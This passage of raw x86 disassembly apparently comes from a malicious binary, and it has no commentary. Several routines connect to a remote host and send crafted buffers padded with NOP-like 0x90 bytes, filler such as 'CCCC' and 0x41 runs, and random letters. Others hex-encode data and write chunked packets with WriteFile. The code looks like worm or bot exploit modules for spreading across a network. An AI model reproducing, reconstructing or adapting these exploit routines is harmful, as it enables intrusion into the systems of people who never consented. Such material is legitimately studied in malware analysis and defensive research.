add [esi+368h], eax
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_40B32A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B4D5 proc near ; DATA XREF: .data:004167D0�o
var_1B68 = byte ptr -1B68h
var_B68 = byte ptr -0B68h
var_968 = byte ptr -968h
var_960 = dword ptr -960h
var_958 = dword ptr -958h
var_950 = byte ptr -950h
var_90C = byte ptr -90Ch
var_8EC = byte ptr -8ECh
var_8E8 = byte ptr -8E8h
var_8E4 = byte ptr -8E4h
var_8E0 = byte ptr -8E0h
var_8DC = byte ptr -8DCh
var_884 = byte ptr -884h
var_87E = byte ptr -87Eh
var_876 = byte ptr -876h
var_872 = byte ptr -872h
var_86E = byte ptr -86Eh
var_868 = byte ptr -868h
var_168 = byte ptr -168h
var_7C = byte ptr -7Ch
var_72 = byte ptr -72h
var_6E = byte ptr -6Eh
var_36 = byte ptr -36h
var_32 = byte ptr -32h
var_2E = byte ptr -2Eh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1B68h
call sub_4108B0
push esi
push edi
mov edi, [ebp+arg_0]
push 48h
push offset dword_4146F8
push dword ptr [edi+3Eh]
call sub_403D54
push 0EA60h
push dword ptr [edi+3Eh]
call sub_403DD6
add esp, 14h
test eax, eax
jz loc_40B79E
xor esi, esi
lea eax, [ebp+var_1B68]
push esi
push 1000h
push eax
push dword ptr [edi+3Eh]
call ds:dword_411258 ; recv
push 7
push offset dword_4146F0
push dword ptr [edi+2Ah]
lea eax, [edi+146h]
push eax
lea eax, [edi+0C6h]
push eax
lea eax, [ebp+var_B68]
push dword ptr [edi+0C2h]
push 200h
push eax
call sub_40D700
add esp, 20h
cmp eax, esi
mov [ebp+arg_0], eax
jz loc_40B79E
push ebx
mov ebx, 168h
loc_40B569: ; CODE XREF: sub_40B4D5+A9�j
push 7Ah
push 61h
call sub_40AADE
mov [ebp+esi+var_168], al
inc esi
pop ecx
cmp esi, ebx
pop ecx
jl short loc_40B569
push 0Ah
lea eax, [ebp+var_7C]
push offset loc_4147E8
push eax
call sub_410838 ; memcpy
push 2
lea eax, [ebp+var_72]
push offset loc_414838
push eax
call sub_410838 ; memcpy
push 4
lea eax, [ebp+var_6E]
push offset loc_414830
push eax
call sub_410838 ; memcpy
push 2
lea eax, [ebp+var_36]
push offset loc_414834
push eax
call sub_410838 ; memcpy
push 4
lea eax, [ebp+var_32]
push (offset loc_41482B+1)
push eax
call sub_410838 ; memcpy
push 0Bh
lea eax, [ebp+var_2E]
push offset loc_4147DC
push eax
call sub_410838 ; memcpy
add esp, 48h
lea eax, [ebp+var_968]
mov esi, 3E6h
sub esi, [ebp+arg_0]
push 18h
push offset dword_414744
push eax
call sub_410838 ; memcpy
push 44h
lea eax, [ebp+var_950]
push offset dword_414760
push eax
call sub_410838 ; memcpy
push 20h
lea eax, [ebp+var_90C]
push 0FFFFFF90h
push eax
call sub_410850 ; memset
push 4
lea eax, [ebp+var_8EC]
push offset loc_4147F4
push eax
call sub_410838 ; memcpy
push 4
lea eax, [ebp+var_8E8]
push offset loc_414828
push eax
call sub_410838 ; memcpy
push 4
lea eax, [ebp+var_8E4]
push offset dword_414820
push eax
call sub_410838 ; memcpy
add esp, 48h
lea eax, [ebp+var_8E0]
push 4
push offset loc_414824
push eax
call sub_410838 ; memcpy
push 58h
lea eax, [ebp+var_8DC]
push 0FFFFFF90h
push eax
call sub_410850 ; memset
push 6
lea eax, [ebp+var_884]
push offset loc_4147FC
push eax
call sub_410838 ; memcpy
push 8
push 0FFFFFF90h
lea eax, [ebp+var_87E]
push eax
call sub_410850 ; memset
push 4
lea eax, [ebp+var_876]
push offset loc_414804
push eax
call sub_410838 ; memcpy
push 4
lea eax, [ebp+var_872]
push 0FFFFFF90h
push eax
call sub_410850 ; memset
add esp, 48h
lea eax, [ebp+var_86E]
push 6
push offset loc_41480C
push eax
call sub_410838 ; memcpy
push esi
lea eax, [ebp+var_868]
push 0FFFFFF90h
push eax
call sub_410850 ; memset
push [ebp+arg_0]
add esi, 100h
lea eax, [ebp+var_B68]
push eax
lea eax, [ebp+esi+var_968]
push eax
call sub_410838 ; memcpy
add esi, [ebp+arg_0]
lea eax, [ebp+var_168]
push ebx
push eax
lea eax, [ebp+esi+var_968]
push eax
call sub_410838 ; memcpy
add esi, ebx
push 0Ah
push offset off_414814
lea eax, [ebp+esi+var_968]
push eax
call sub_410838 ; memcpy
add esi, 0Ah
push 32h
push offset dword_4147A8
lea eax, [ebp+esi+var_968]
push eax
call sub_410838 ; memcpy
add esi, 32h
add esp, 48h
mov [ebp+var_960], esi
lea eax, [esi-18h]
push esi
mov [ebp+var_958], eax
lea eax, [ebp+var_968]
push eax
push dword ptr [edi+3Eh]
call sub_403D54
push 0EA60h
push dword ptr [edi+3Eh]
call sub_403DD6
add esp, 14h
test eax, eax
pop ebx
jz short loc_40B79E
push 0
lea eax, [ebp+var_1B68]
push 1000h
push eax
push dword ptr [edi+3Eh]
call ds:dword_411258 ; recv
loc_40B79E: ; CODE XREF: sub_40B4D5+33�j
; sub_40B4D5+88�j ...
pop edi
pop esi
leave
retn
sub_40B4D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B7A2 proc near ; CODE XREF: sub_40BB6E+F4�p
; sub_40BB6E+102�p ...
var_A4F0 = byte ptr -0A4F0h
var_A488 = byte ptr -0A488h
var_8418 = byte ptr -8418h
var_7418 = byte ptr -7418h
var_73A8 = byte ptr -73A8h
var_68E4 = byte ptr -68E4h
var_5340 = byte ptr -5340h
var_42AC = byte ptr -42ACh
var_37E4 = byte ptr -37E4h
var_37E1 = byte ptr -37E1h
var_37B7 = byte ptr -37B7h
var_37B5 = byte ptr -37B5h
var_37B4 = byte ptr -37B4h
var_27E4 = byte ptr -27E4h
var_2768 = byte ptr -2768h
var_1F98 = byte ptr -1F98h
var_1AED = byte ptr -1AEDh
var_1800 = byte ptr -1800h
var_101C = byte ptr -101Ch
var_100C = byte ptr -100Ch
var_CE8 = byte ptr -0CE8h
var_CE4 = byte ptr -0CE4h
var_CD8 = byte ptr -0CD8h
var_A54 = byte ptr -0A54h
var_A50 = byte ptr -0A50h
var_9B0 = byte ptr -9B0h
var_2A4 = byte ptr -2A4h
var_294 = byte ptr -294h
var_280 = byte ptr -280h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 0A4F0h
call sub_4108B0
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push 7
push offset dword_4146F0
push dword ptr [esi+2Ah]
lea eax, [esi+146h]
push eax
lea eax, [esi+0C6h]
push eax
lea eax, [ebp+var_280]
push dword ptr [esi+0C2h]
push 200h
push eax
call sub_40D700
mov [ebp+arg_0], eax
lea eax, [ebp+var_280]
add esp, 20h
test eax, eax
jz loc_40BB66
lea eax, [ebp+var_80]
push eax
lea eax, [esi+42h]
push eax
call sub_40311D
lea eax, [ebp+var_80]
push eax
call sub_410B18 ; wcslen
mov ebx, eax
push 60h
lea eax, [ebp+var_37E4]
push offset dword_414A54
push eax
shl ebx, 1
call sub_410838 ; memcpy
lea eax, [ebp+var_80]
push ebx
push eax
lea eax, [ebp+var_37B4]
push eax
call sub_410838 ; memcpy
push 9
lea eax, [ebp+ebx+var_37B5]
push (offset aC_0+3)
push eax
call sub_410838 ; memcpy
mov al, bl
add al, 34h
mov [ebp+var_37E1], al
mov al, bl
add al, 9
add ebx, 38h
mov [ebp+var_37B7], al
lea eax, [ebp+var_37E4]
push ebx
push eax
push dword ptr [esi+3Eh]
call sub_403D54
mov edi, 0EA60h
push edi
push dword ptr [esi+3Eh]
call sub_403DD6
add esp, 44h
test eax, eax
jz loc_40BA6B
mov ebx, 1000h
push 0
lea eax, [ebp+var_8418]
push ebx
push eax
push dword ptr [esi+3Eh]
call ds:dword_411258 ; recv
push 68h
push offset dword_414AB8
push dword ptr [esi+3Eh]
call sub_403D54
push edi
push dword ptr [esi+3Eh]
call sub_403DD6
add esp, 14h
test eax, eax
jz loc_40BA6B
push 0
lea eax, [ebp+var_8418]
push ebx
push eax
push dword ptr [esi+3Eh]
call ds:dword_411258 ; recv
push 0A0h
push offset dword_414B24
push dword ptr [esi+3Eh]
call sub_403D54
push edi
push dword ptr [esi+3Eh]
call sub_403DD6
add esp, 14h
test eax, eax
jz loc_40BA6B
push 0
lea eax, [ebp+var_8418]
push ebx
push eax
push dword ptr [esi+3Eh]
call ds:dword_411258 ; recv
mov ebx, [ebp+arg_4]
test ebx, ebx
jz loc_40BAA5
push 7Fh
lea eax, [ebp+var_1800]
push 0DACh
push eax
call sub_40C90F
lea ebx, ds:414E4Ch[ebx*4]
push 4
lea eax, [ebp+var_101C]
push ebx
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
lea eax, [ebp+var_280]
push eax
lea eax, [ebp+var_100C]
push eax
call sub_410838 ; memcpy
push 4
lea eax, [ebp+var_CE8]
push offset loc_414E58
push eax
call sub_410838 ; memcpy
push 4
lea eax, [ebp+var_CE4]
push ebx
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
lea eax, [ebp+var_280]
push eax
lea eax, [ebp+var_CD8]
push eax
call sub_410838 ; memcpy
add esp, 48h
and [ebp+var_A54], 0
lea eax, [ebp+var_1800]
push 0DADh
push eax
lea eax, [ebp+var_5340]
push eax
call sub_405172
mov ebx, 1C52h
lea eax, [ebp+var_A4F0]
push ebx
push 31h
push eax
call sub_410850 ; memset
push ebx
lea eax, [ebp+var_7418]
push 31h
push eax
call sub_410850 ; memset
push 68h
lea eax, [ebp+var_A4F0]
push offset dword_414CDC
push eax
call sub_410838 ; memcpy
lea eax, [ebp+var_5340]
push 1B5Ah
push eax
lea eax, [ebp+var_A488]
push eax
call sub_410838 ; memcpy
push 70h
lea eax, [ebp+var_7418]
push offset dword_414D48
push eax
call sub_410838 ; memcpy
add esp, 48h
lea eax, [ebp+var_42AC]
push 0A5Eh
push eax
lea eax, [ebp+var_73A8]
push eax
call sub_410838 ; memcpy
push 84h
lea eax, [ebp+var_68E4]
push offset dword_414DBC
push eax
call sub_410838 ; memcpy
push 10FCh
lea eax, [ebp+var_A4F0]
push eax
push dword ptr [esi+3Eh]
call sub_403D54
push edi
push dword ptr [esi+3Eh]
call sub_403DD6
add esp, 2Ch
test eax, eax
jnz short loc_40BA72
loc_40BA6B: ; CODE XREF: sub_40B7A2+E2�j
; sub_40B7A2+11D�j ...
xor eax, eax
jmp loc_40BB69
; ---------------------------------------------------------------------------
loc_40BA72: ; CODE XREF: sub_40B7A2+2C7�j
push 0
lea eax, [ebp+var_8418]
push 640h
push eax
push dword ptr [esi+3Eh]
call ds:dword_411258 ; recv
lea eax, [ebp+var_7418]
push 0FDCh
push eax
push dword ptr [esi+3Eh]
call sub_403D54
add esp, 0Ch
jmp loc_40BB66
; ---------------------------------------------------------------------------
loc_40BAA5: ; CODE XREF: sub_40B7A2+174�j
push 0E29h
lea eax, [ebp+var_27E4]
push 31h
push eax
call sub_410850 ; memset
mov edi, 7D0h
lea eax, [ebp+var_A50]
push edi
push 0FFFFFF90h
push eax
call sub_410850 ; memset
push [ebp+arg_0]
lea eax, [ebp+var_280]
push eax
lea eax, [ebp+var_9B0]
push eax
call sub_410838 ; memcpy
push 4
lea eax, [ebp+var_2A4]
push offset dword_414E4C
push eax
call sub_410838 ; memcpy
push 7
lea eax, [ebp+var_294]
push offset sub_414E44
push eax
call sub_410838 ; memcpy
push 7Ch
lea eax, [ebp+var_27E4]
push offset dword_414BC8
push eax
call sub_410838 ; memcpy
add esp, 48h
lea eax, [ebp+var_A50]
push edi
push eax
lea eax, [ebp+var_2768]
push eax
call sub_410838 ; memcpy
push 90h
lea eax, [ebp+var_1F98]
push offset off_414C48
push eax
call sub_410838 ; memcpy
and [ebp+var_1AED], 0
lea eax, [ebp+var_27E4]
push 0CF8h
push eax
push dword ptr [esi+3Eh]
call sub_403D54
add esp, 24h
loc_40BB66: ; CODE XREF: sub_40B7A2+50�j
; sub_40B7A2+2FE�j
push 1
pop eax
loc_40BB69: ; CODE XREF: sub_40B7A2+2CB�j
pop edi
pop esi
pop ebx
leave
retn
sub_40B7A2 endp
; =============== S U B R O U T I N E =======================================
sub_40BB6E proc near ; CODE XREF: sub_40BB6E+12B�p
var_30 = dword ptr -30h
var_1C = byte ptr -1Ch
var_C = byte ptr -0Ch
arg_0 = byte ptr 4
arg_14 = byte ptr 18h
arg_1004 = dword ptr 1008h
mov eax, 1004h
call sub_4108B0
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_1004]
xor ebx, ebx
push edi
cmp [esi+3Eh], ebx
mov [esp+10h], ebx
mov edi, 0EA60h
jnz short loc_40BBB8
push edi
lea eax, [esi+17h]
push ebx
push eax
lea eax, [esi+42h]
mov dword ptr [esp+1Ch], 1
push eax
call sub_403BBB
add esp, 10h
cmp eax, ebx
mov [esi+3Eh], eax
jz loc_40BCA0
loc_40BBB8: ; CODE XREF: sub_40BB6E+23�j
push 89h
push offset dword_41483C
push dword ptr [esi+3Eh]
call sub_403D54
push edi
push dword ptr [esi+3Eh]
call sub_403DD6
add esp, 14h
test eax, eax
jz loc_40BCA0
mov ebp, 1000h
push ebx
mov ebx, ds:dword_411258
lea eax, [esp+14h+arg_0]
push ebp
push eax
push dword ptr [esi+3Eh]
call ebx ; recv
push 0A8h
push offset dword_4148C8
push dword ptr [esi+3Eh]
call sub_403D54
push edi
push dword ptr [esi+3Eh]
call sub_403DD6
add esp, 14h
test eax, eax
jz loc_40BCA0
push 0
lea eax, [esp+24h+var_C]
push ebp
push eax
push dword ptr [esi+3Eh]
call ebx ; recv
push 0DEh
push offset dword_414974
push dword ptr [esi+3Eh]
call sub_403D54
push edi
push dword ptr [esi+3Eh]
call sub_403DD6
add esp, 14h
test eax, eax
jz short loc_40BCA0
xor edi, edi
lea eax, [esp+30h+var_1C]
push edi
push ebp
push eax
push dword ptr [esi+3Eh]
call ebx ; recv
cmp [esp+40h+arg_14], 30h
jnz short loc_40BC77
push 1
push esi
call sub_40B7A2
pop ecx
test eax, eax
pop ecx
jnz short loc_40BC77
push 2
push esi
call sub_40B7A2
jmp short loc_40BC9E
; ---------------------------------------------------------------------------
loc_40BC77: ; CODE XREF: sub_40BB6E+EF�j
; sub_40BB6E+FD�j
cmp [esp+40h+arg_14], 31h
jnz short loc_40BCA0
push edi
push esi
call sub_40B7A2
cmp [esp+48h+var_30], edi
pop ecx
pop ecx
jnz short loc_40BCA0
push dword ptr [esi+3Eh]
call sub_403D27
push esi
mov [esi+3Eh], edi
call sub_40BB6E
loc_40BC9E: ; CODE XREF: sub_40BB6E+107�j
pop ecx
pop ecx
loc_40BCA0: ; CODE XREF: sub_40BB6E+44�j
; sub_40BB6E+6A�j ...
pop edi
pop esi
pop ebp
pop ebx
add esp, 1004h
retn
sub_40BB6E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BCAB proc near ; DATA XREF: .data:00416A14�o
var_A00 = byte ptr -0A00h
var_800 = byte ptr -800h
var_7DC = byte ptr -7DCh
var_5CC = byte ptr -5CCh
var_5C8 = byte ptr -5C8h
var_5C4 = byte ptr -5C4h
var_5C0 = byte ptr -5C0h
var_5BC = byte ptr -5BCh
var_5B8 = byte ptr -5B8h
var_5B4 = byte ptr -5B4h
var_5B0 = byte ptr -5B0h
var_5AC = byte ptr -5ACh
var_554 = byte ptr -554h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A00h
push ebx
mov ebx, [ebp+arg_0]
push 1
push offset byte_417B60
push dword ptr [ebx+2Ah]
lea eax, [ebx+146h]
push eax
lea eax, [ebx+0C6h]
push eax
lea eax, [ebp+var_A00]
push dword ptr [ebx+0C2h]
push 200h
push eax
call sub_40D700
add esp, 20h
mov [ebp+arg_0], eax
test eax, eax
jz loc_40BE04
push esi
push edi
push 24h
lea eax, [ebp+var_800]
push (offset loc_414E66+2)
push eax
call sub_410838 ; memcpy
push 210h
lea eax, [ebp+var_7DC]
push 4Dh
push eax
call sub_410850 ; memset
push 4
lea eax, [ebp+var_5CC]
pop edi
push edi
push offset dword_414E90
push eax
call sub_410838 ; memcpy
push edi
lea eax, [ebp+var_5C8]
push offset aCccc ; "CCCC"
push eax
call sub_410838 ; memcpy
push edi
lea eax, [ebp+var_5C4]
push offset loc_414E60
push eax
call sub_410838 ; memcpy
mov esi, (offset loc_414E60+4)
push edi
lea eax, [ebp+var_5C0]
push esi
push eax
call sub_410838 ; memcpy
add esp, 48h
lea eax, [ebp+var_5BC]
push edi
push esi
push eax
call sub_410838 ; memcpy
push edi
lea eax, [ebp+var_5B8]
push offset a3333 ; "3333"
push eax
call sub_410838 ; memcpy
push edi
lea eax, [ebp+var_5B4]
push esi
push eax
call sub_410838 ; memcpy
push edi
lea eax, [ebp+var_5B0]
push esi
push eax
call sub_410838 ; memcpy
push 58h
lea eax, [ebp+var_5AC]
push 41h
push eax
call sub_410850 ; memset
mov esi, [ebp+arg_0]
lea eax, [ebp+var_A00]
push esi
push eax
lea eax, [ebp+var_554]
push eax
call sub_410838 ; memcpy
add esp, 48h
add esi, 2ACh
push 5
lea eax, [ebp+esi+var_800]
push offset dword_414E98
push eax
call sub_410838 ; memcpy
add esi, 5
lea eax, [ebp+var_800]
push esi
push eax
push dword ptr [ebx+3Eh]
call sub_403D54
add esp, 18h
pop edi
pop esi
loc_40BE04: ; CODE XREF: sub_40BCAB+44�j
pop ebx
leave
retn
sub_40BCAB endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BE08 proc near ; CODE XREF: sub_40C0F9+6�p
; seg000:0040C10D�p
var_2208 = byte ptr -2208h
var_21FF = byte ptr -21FFh
var_1208 = byte ptr -1208h
var_1205 = byte ptr -1205h
var_11DB = byte ptr -11DBh
var_11D8 = byte ptr -11D8h
var_10D8 = byte ptr -10D8h
var_980 = byte ptr -980h
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2208h
call sub_4108B0
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push dword ptr [esi+2Ah]
lea eax, [esi+146h]
push eax
lea eax, [esi+0C6h]
push eax
lea eax, [ebp+var_208]
push dword ptr [esi+0C2h]
push 200h
push eax
call sub_40D628
add esp, 18h
mov [ebp+var_8], eax
test eax, eax
jz loc_40C0F4
push 89h
push offset dword_414EB0
push dword ptr [esi+3Eh]
call sub_403D54
mov ebx, 0EA60h
mov edi, 1000h
push ebx
lea eax, [ebp+var_2208]
push edi
push eax
push dword ptr [esi+3Eh]
call sub_403DAD
add esp, 1Ch
cmp eax, 0FFFFFFFFh
jz loc_40C0F4
cmp eax, 0Ah
jbe loc_40C0F4
cmp [ebp+var_21FF], 0
jnz loc_40C0F4
push 0A8h
push offset dword_414F3C
push dword ptr [esi+3Eh]
call sub_403D54
push ebx
lea eax, [ebp+var_2208]
push edi
push eax
push dword ptr [esi+3Eh]
call sub_403DAD
add esp, 1Ch
cmp eax, 0FFFFFFFFh
jz loc_40C0F4
cmp eax, 0Ah
jbe loc_40C0F4
push 0DEh
push offset dword_414FE8
push dword ptr [esi+3Eh]
call sub_403D54
push ebx
lea eax, [ebp+var_2208]
push edi
push eax
push dword ptr [esi+3Eh]
call sub_403DAD
add esp, 1Ch
cmp eax, 0FFFFFFFFh
jz loc_40C0F4
cmp eax, 0Ah
jbe loc_40C0F4
cmp [ebp+var_21FF], 0
jnz loc_40C0F4
push 30h
lea eax, [ebp+var_1208]
push offset dword_4150C8
push eax
call sub_410838 ; memcpy
lea eax, [ebp+var_11D8]
push eax
lea eax, [esi+42h]
push eax
call sub_40311D
lea eax, [eax+eax-2]
push 1
lea ecx, [eax+30h]
add eax, 9
mov [ebp+var_4], eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_11DB]
push eax
mov [ebp+arg_0], ecx
call sub_410838 ; memcpy
mov eax, [ebp+arg_0]
push 8
push offset dword_4150FC
lea eax, [ebp+eax+var_1208]
push eax
call sub_410838 ; memcpy
add [ebp+arg_0], 8
push 1
mov eax, [ebp+arg_0]
add eax, 0FFFFFFFCh
mov [ebp+var_4], eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_1205]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
lea eax, [ebp+var_1208]
push eax
push dword ptr [esi+3Eh]
call sub_403D54
add esp, 44h
lea eax, [ebp+var_2208]
push ebx
push edi
push eax
push dword ptr [esi+3Eh]
call sub_403DAD
add esp, 10h
cmp eax, 0FFFFFFFFh
jz loc_40C0F4
cmp eax, 0Ah
jbe loc_40C0F4
cmp [ebp+var_21FF], 0
jnz loc_40C0F4
push 6Ah
push offset dword_415108
push dword ptr [esi+3Eh]
call sub_403D54
push ebx
lea eax, [ebp+var_2208]
push edi
push eax
push dword ptr [esi+3Eh]
call sub_403DAD
add esp, 1Ch
cmp eax, 0FFFFFFFFh
jz loc_40C0F4
cmp eax, 0Ah
jbe loc_40C0F4
cmp [ebp+var_21FF], 0
jnz loc_40C0F4
push 0A0h
push offset dword_415174
push dword ptr [esi+3Eh]
call sub_403D54
push ebx
lea eax, [ebp+var_2208]
push edi
push eax
push dword ptr [esi+3Eh]
call sub_403DAD
add esp, 1Ch
cmp eax, 0FFFFFFFFh
jz loc_40C0F4
cmp eax, 0Ah
jbe loc_40C0F4
cmp [ebp+var_21FF], 0
jnz loc_40C0F4
push 894h
lea eax, [ebp+var_1208]
push 0FFFFFF90h
push eax
call sub_410850 ; memset
add esp, 0Ch
cmp [ebp+arg_4], 0
push 130h
jnz short loc_40C08F
push offset dword_415218
jmp short loc_40C094
; ---------------------------------------------------------------------------
loc_40C08F: ; CODE XREF: sub_40BE08+27E�j
push offset dword_41534C
loc_40C094: ; CODE XREF: sub_40BE08+285�j
lea eax, [ebp+var_1208]
push eax
call sub_410838 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_208]
push [ebp+var_8]
push eax
lea eax, [ebp+var_10D8]
push eax
call sub_410838 ; memcpy
push 0Ch
lea eax, [ebp+var_980]
push offset dword_415480
push eax
call sub_410838 ; memcpy
lea eax, [ebp+var_1208]
push 894h
push eax
push dword ptr [esi+3Eh]
call sub_403D54
push ebx
lea eax, [ebp+var_2208]
push edi
push eax
push dword ptr [esi+3Eh]
call sub_403DAD
add esp, 34h
loc_40C0F4: ; CODE XREF: sub_40BE08+43�j
; sub_40BE08+7C�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40BE08 endp
; =============== S U B R O U T I N E =======================================
sub_40C0F9 proc near ; DATA XREF: .data:00416844�o
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_40BE08
pop ecx
pop ecx
retn
sub_40C0F9 endp
; ---------------------------------------------------------------------------
push 1
push dword ptr [esp+8]
call sub_40BE08
pop ecx
pop ecx
retn
; =============== S U B R O U T I N E =======================================
sub_40C115 proc near ; CODE XREF: sub_40C225+12A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
xor esi, esi
cmp [esp+4+arg_4], esi
jbe short loc_40C144
mov edx, [esp+4+arg_8]
loc_40C122: ; CODE XREF: sub_40C115+2D�j
mov eax, [esp+4+arg_0]
mov cl, [esi+eax]
mov al, cl
and cl, 0Fh
shr al, 4
add cl, 41h
add al, 41h
mov [edx], cl
mov [edx+1], al
inc esi
inc edx
inc edx
cmp esi, [esp+4+arg_4]
jb short loc_40C122
loc_40C144: ; CODE XREF: sub_40C115+7�j
pop esi
retn
sub_40C115 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C146 proc near ; CODE XREF: sub_40C146+CD�p
; sub_40C225+4DC�p
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_7 = byte ptr 0Fh
arg_C = word ptr 14h
arg_14 = dword ptr 1Ch
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = byte ptr 30h
arg_2B = byte ptr 33h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_28], 0
push ebx
push esi
push edi
jz short loc_40C15A
or [ebp+arg_7], 1
jmp short loc_40C15E
; ---------------------------------------------------------------------------
loc_40C15A: ; CODE XREF: sub_40C146+C�j
and [ebp+arg_7], 0FEh
loc_40C15E: ; CODE XREF: sub_40C146+12�j
mov ebx, [ebp+arg_20]
mov eax, [ebp+arg_24]
lea ecx, [ebx+18h]
cmp ecx, eax
ja short loc_40C17F
or [ebp+arg_7], 2
and [ebp+arg_2B], 0
lea eax, [ebx+18h]
mov [ebp+arg_14], ebx
mov [ebp+arg_C], ax
jmp short loc_40C191
; ---------------------------------------------------------------------------
loc_40C17F: ; CODE XREF: sub_40C146+23�j
mov [ebp+arg_C], ax
add eax, 0FFFFFFE8h
and [ebp+arg_7], 0FDh
mov [ebp+arg_14], eax
mov [ebp+arg_2B], 1
loc_40C191: ; CODE XREF: sub_40C146+37�j
movzx eax, [ebp+arg_C]
push eax
mov [ebp+var_4], eax
call sub_41082C ; malloc
test eax, eax
pop ecx
mov [ebp+arg_20], eax
jnz short loc_40C1AA
loc_40C1A6: ; CODE XREF: sub_40C146+A4�j
xor eax, eax
jmp short loc_40C220
; ---------------------------------------------------------------------------
loc_40C1AA: ; CODE XREF: sub_40C146+5E�j
push 6
lea esi, [ebp+arg_4]
pop ecx
mov edi, eax
rep movsd
mov edi, [ebp+arg_14]
mov esi, [ebp+arg_1C]
push edi
add eax, 18h
push esi
push eax
call sub_410838 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_8]
push 0
push eax
push [ebp+var_4]
push [ebp+arg_20]
push [ebp+arg_0]
call ds:dword_411070 ; WriteFile
push [ebp+arg_20]
test eax, eax
jnz short loc_40C1EC
call sub_410832 ; free
pop ecx
jmp short loc_40C1A6
; ---------------------------------------------------------------------------
loc_40C1EC: ; CODE XREF: sub_40C146+9C�j
call sub_410832 ; free
cmp [ebp+arg_2B], 0
pop ecx
jz short loc_40C21D
push 0
sub ebx, edi
push [ebp+arg_24]
add edi, esi
lea esi, [ebp+arg_4]
push ebx
push edi
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_0]
rep movsd
call sub_40C146
add esp, 2Ch
jmp short loc_40C220
; ---------------------------------------------------------------------------
loc_40C21D: ; CODE XREF: sub_40C146+B0�j
push 1
pop eax
loc_40C220: ; CODE XREF: sub_40C146+62�j
; sub_40C146+D5�j
pop edi
pop esi
pop ebx
leave
retn
sub_40C146 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C225 proc near ; CODE XREF: sub_40C73D+6�p
; sub_40C73D+16�p
var_CEBC = byte ptr -0CEBCh
var_8EBC = byte ptr -8EBCh
var_7364 = byte ptr -7364h
var_5364 = byte ptr -5364h
var_3364 = byte ptr -3364h
var_1364 = dword ptr -1364h
var_A68 = byte ptr -0A68h
var_A63 = byte ptr -0A63h
var_A24 = byte ptr -0A24h
var_5B8 = byte ptr -5B8h
var_3B8 = byte ptr -3B8h
var_8C = byte ptr -8Ch
var_78 = dword ptr -78h
var_6C = byte ptr -6Ch
var_68 = byte ptr -68h
var_67 = byte ptr -67h
var_66 = byte ptr -66h
var_65 = byte ptr -65h
var_64 = dword ptr -64h
var_60 = word ptr -60h
var_5E = word ptr -5Eh
var_5C = dword ptr -5Ch
var_58 = word ptr -58h
var_56 = word ptr -56h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = word ptr -4Ch
var_4A = byte ptr -4Ah
var_48 = byte ptr -48h
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = byte ptr -1Eh
var_1D = byte ptr -1Dh
var_1C = dword ptr -1Ch
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_C = word ptr -0Ch
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 0CEBCh
call sub_4108B0
push ebx
push esi
push edi
xor edi, edi
cmp dword_417B9C, edi
jz loc_40C735
cmp dword_417BA4, edi
jz loc_40C735
mov esi, [ebp+arg_0]
push dword ptr [esi+2Ah]
lea eax, [esi+146h]
push eax
lea eax, [esi+0C6h]
push eax
lea eax, [ebp+var_5B8]
push dword ptr [esi+0C2h]
push 200h
push eax
call sub_40D628
add esp, 18h
cmp eax, edi
mov [ebp+var_4], eax
jz short loc_40C2A8
add esi, 42h
push 2
push esi
mov [ebp+arg_0], esi
call sub_40C794
pop ecx
cmp eax, 3
pop ecx
jz short loc_40C2AF
push 1
push esi
call sub_40C794
pop ecx
cmp eax, 3
pop ecx
jz short loc_40C2AF
loc_40C2A8: ; CODE XREF: sub_40C225+5D�j
xor eax, eax
jmp loc_40C738
; ---------------------------------------------------------------------------
loc_40C2AF: ; CODE XREF: sub_40C225+72�j
; sub_40C225+81�j
push 32Bh
lea eax, [ebp+var_3B8]
push edi
push eax
call sub_410850 ; memset
mov esi, 0DACh
lea eax, [ebp+var_1364]
push esi
push edi
push eax
call sub_410850 ; memset
push 1B58h
lea eax, [ebp+var_8EBC]
push edi
push eax
call sub_410850 ; memset
push 0DABh
lea eax, [ebp+var_1364]
push 41h
push eax
call sub_410850 ; memset
mov eax, [ebp+arg_4]
push 5
push offset dword_415490
lea ebx, [eax+eax*8]
